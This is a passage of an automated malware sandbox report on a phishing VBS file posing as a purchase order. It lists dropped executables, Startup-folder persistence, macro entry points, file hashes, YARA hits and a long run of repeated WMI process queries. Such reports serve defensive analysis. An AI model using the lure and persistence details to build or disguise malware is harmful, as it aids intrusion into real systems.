                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E37FFD16_2_00E37FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4BFB816_2_00E4BFB8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2DF6916_2_00E2DF69
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001EDCD022_2_001EDCD0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001EA0C022_2_001EA0C0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020018322_2_00200183
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022220C22_2_0022220C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001E853022_2_001E8530
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020067722_2_00200677
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001E667022_2_001E6670
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021877922_2_00218779
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024A8DC22_2_0024A8DC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00200A8F22_2_00200A8F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001E6BBC22_2_001E6BBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020AC8322_2_0020AC83
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001E8CA022_2_001E8CA0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FAD5C22_2_001FAD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00214EBF22_2_00214EBF
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00200EC422_2_00200EC4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002430AD22_2_002430AD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021113E22_2_0021113E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002012F922_2_002012F9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021542F22_2_0021542F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F5D022_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001F368022_2_001F3680
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021599F22_2_0021599F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020DA7422_2_0020DA74
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001E5D3222_2_001E5D32
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020BDF622_2_0020BDF6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001EBDF022_2_001EBDF0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00201E5A22_2_00201E5A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020DF6922_2_0020DF69
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022BFB822_2_0022BFB8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00217FFD22_2_00217FFD
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: HTAGVDFUIE.xlsm.8.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX4F1F.tmp 7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\Synaptics.exe 6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe 6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: String function: 00E1F885 appears 67 times
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: String function: 00E27750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 001FF885 appears 134 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0020247B appears 36 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0020017E appears 44 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00210650 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 001F2570 appears 46 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00201BC7 appears 41 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 001E5CD3 appears 44 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 001ECAEE appears 46 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 001FC619 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00207750 appears 84 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 001FE3CC appears 44 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00208AE8 appears 46 times
                                Source: Purchase Order No. G02873362-Docx.vbsInitial sample: Strings found which are bigger than 50
                                Source: RNEQTT[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: RNEQTT[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCX4F1F.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.8.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@25/34@22/5
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022D712 GetLastError,FormatMessageW,7_2_0022D712
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021B8B0 AdjustTokenPrivileges,CloseHandle,7_2_0021B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0021BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_0021BEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3B8B0 AdjustTokenPrivileges,CloseHandle,16_2_00E3B8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E3BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00E3BEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021B8B0 AdjustTokenPrivileges,CloseHandle,22_2_0021B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0021BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,22_2_0021BEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,7_2_0022EA85
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,7_2_00226F5B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022EFCD CoInitialize,CoCreateInstance,CoUninitialize,7_2_0022EFCD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001E31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,7_2_001E31F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Local\Temp\VFNCBO.vbsJump to behavior
                                Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1762602570.0000022996705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1761289486.0000022996F9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4F1F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, type: DROPPED
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
